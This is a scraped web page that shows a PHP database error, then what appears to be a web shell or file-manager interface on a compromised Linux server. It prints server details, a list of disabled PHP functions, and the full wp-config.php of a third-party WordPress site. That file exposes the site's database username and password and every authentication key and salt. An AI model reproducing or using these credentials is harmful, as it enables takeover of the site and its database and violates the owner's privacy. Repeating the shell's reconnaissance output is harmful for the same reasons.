A PHP Error was encountered

Severity: Warning

Message: mysqli::real_connect(): (HY000/2002): Connection timed out

Filename: mysqli/mysqli_driver.php

Line Number: 201

Backtrace:

File: /www/wwwroot/dash.konsole.xyz/application/core/MY_Controller.php
Line: 343
Function: __construct

File: /www/wwwroot/dash.konsole.xyz/application/controllers/Api.php
Line: 12
Function: __construct

File: /www/wwwroot/dash.konsole.xyz/index.php
Line: 316
Function: require_once

Database Error

数据库发生错误。

无法使用提供的设置连接到数据库服务器。

Filename: core/MY_Controller.php

Line Number: 343


Fatal error: Uncaught Error: Call to a member function close() on string in /www/wwwroot/dash.konsole.xyz/application/core/MY_Controller.php:349 Stack trace: #0 [internal function]: Index_Controller->__destruct() #1 {main} thrown in /www/wwwroot/dash.konsole.xyz/application/core/MY_Controller.php on line 349
HEX
HEX
Server: Apache
System: Linux iz2ze36uo36nxfvn3g4k0iz 3.10.0-693.2.2.el7.x86_64 #1 SMP Tue Sep 12 22:26:13 UTC 2017 x86_64
User: www (1000)
PHP: 5.6.30
Disabled: passthru,exec,system,chroot,chgrp,chown,shell_exec,proc_open,proc_get_status,popen,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru
Upload Files
File: /www/wwwroot/www.chinadee.com.cn/wp-config.php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the installation.
 * You don't have to use the web site, you can copy this file to "wp-config.php"
 * and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://wordpress.org/support/article/editing-wp-config-php/
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'ww_chinadee_com' );

/** MySQL database username */
define( 'DB_USER', 'ww_chinadee_com' );

/** MySQL database password */
define( 'DB_PASSWORD', 'pEkb7A2w88CsBB2i' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
 * Authentication unique keys and salts.
 *
 * Change these to different unique phrases! You can generate these using
 * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
 *
 * You can change these at any point in time to invalidate all existing cookies.
 * This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',         '@MLk9^s1rW]_3%)Mjj;>ywRuSa7ElWRzU)itc;<nEeE$7;cQVjM/ep>f;x2)LK,+' );
define( 'SECURE_AUTH_KEY',  'P(u_~nG_SCG;18do;Mr.[l{j08(Kd0g]2LIkp,1y;ZVf`_Rl,ylPdSnz}Iu3R`=?' );
define( 'LOGGED_IN_KEY',    '(L+Pb#hXn&9 zZP^p4vHf;#(NDVd_F-6:_$&M@pO2h9ci4wajAh+^+sz=C{;6]>e' );
define( 'NONCE_KEY',        '0__$Jm|;()B~5gI0fUM/d#c)ETk@ }amT&Yn5FwAc%znL~!36TlPsV@SD&m/eEf)' );
define( 'AUTH_SALT',        'FPqrB}qAJzfmDAkbC&.f>ZQpiBXKn{_H}zL36<#xB,ADQ}j0)&d`Ce]VK-6C|0~0' );
define( 'SECURE_AUTH_SALT', 'IAFXi1VNMJ{$3b~,H4t=e_}YMFdT6l>tOc7IcunPlz#ru=CF1YH<I)s=yT! ~*k?' );
define( 'LOGGED_IN_SALT',   'clJ^ztv4.u*z?<zA }2uU>Kw&`n=gox9OTl=^&#X~}Nd0lHwJHlgG[Am_G|>b]H_' );
define( 'NONCE_SALT',       'DFT8//VWeyd7Mj/_/3WJg!/8q~K%dz~%?GL^-sLDk(As_YHBM(bYsQ!b6t],gb ,' );

/**#@-*/

/**
 * WordPress database table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'wp_zing_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the documentation.
 *
 * @link https://wordpress.org/support/article/debugging-in-wordpress/
 */
define( 'WP_DEBUG', false );

/* Add any custom values between this line and the "stop editing" line. */



/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
	define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';